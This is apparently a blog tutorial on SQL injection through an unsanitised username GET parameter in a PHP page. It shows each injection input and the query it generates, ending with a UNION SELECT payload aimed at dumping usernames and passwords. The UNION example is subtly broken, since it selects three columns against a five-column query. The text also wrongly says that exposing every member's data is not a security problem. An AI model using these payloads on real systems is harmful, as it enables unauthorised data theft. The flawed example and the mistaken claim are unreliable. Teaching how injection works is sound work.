String Parameter Injection Example

06:46 Unknown 0 Comments

Let’s suppose the page we are testing has GET parameter named username. When loaded, it displays the full name and email of the specified member. Here is what the URL looks like when a regular request is made.

REAL USERNAME PARAMETER IN URL.
http://www.victim.com/viewMember.php?username=admin
And now an overview of what happens in the page’s script.
BUILDING THE QUERY WITHOUT SANITIZING INPUT.
$sql = "SELECT id, username, first_name, last_name, email FROM members WHERE username='".$_GET['username']."'";

QUERY QENERATED (THIS QUERY IS EXECUTED).
SELECT id, username, first_name, last_name, email FROM members WHERE username='admin'
The user input is integrated as is. Therefore, the attacker can insert SQL segments and manipulate the WHERE clause. However, before gaining control over the query, he must simulate the end of the parameter. He must also handle the original closing quote to make a valid SQL query. Let's see how it is done.

Closing Quote

Since no input sanitizing is made, the first quote appearing in the input will be considered as the closing quote.
PARAMETER SUBMITTED BY THE ATTACKER (ADDING A CLOSING QUOTE).
admin'

QUERY GENERATED (INVALID SQL SYNTAX).
SELECT id, username, first_name, last_name, email FROM members WHERE username='admin''

Trailing Quote

The last query is invalid because of the remaining single quote. When the tester adds an always true condition with a missing quote, the sql injection is successful.
PARAMETER SUBMITTED BY THE ATTACKER (NOTICE THE MISSING LAST QUOTE).
admin' OR 'a'='a

QUERY GENERATED (VALID QUERY).
SELECT id, username, first_name, last_name, email FROM members WHERE username='admin' OR 'a'='a'
By making the WHERE clause always true, the attacker will view information about all users at once. This is not a security problem since information could have been retrieved manually. However here is what he could have done.
MALICIOUS PARAMETER.
invalid-username' UNION SELECT 1, username, passwords FROM members WHERE 'x'='x

QUERY GENERATED.
SELECT id, username, first_name, last_name, email FROM members WHERE username='invalid-username' UNION SELECT 1, username, passwords FROM members WHERE 'x'='x'
As you can guess, this would list all username and passwords in the database. This technique is detailed in the SQL injection UNION attacks article.

0 nhận xét:

Đăng ký: Đăng Nhận xét (Atom)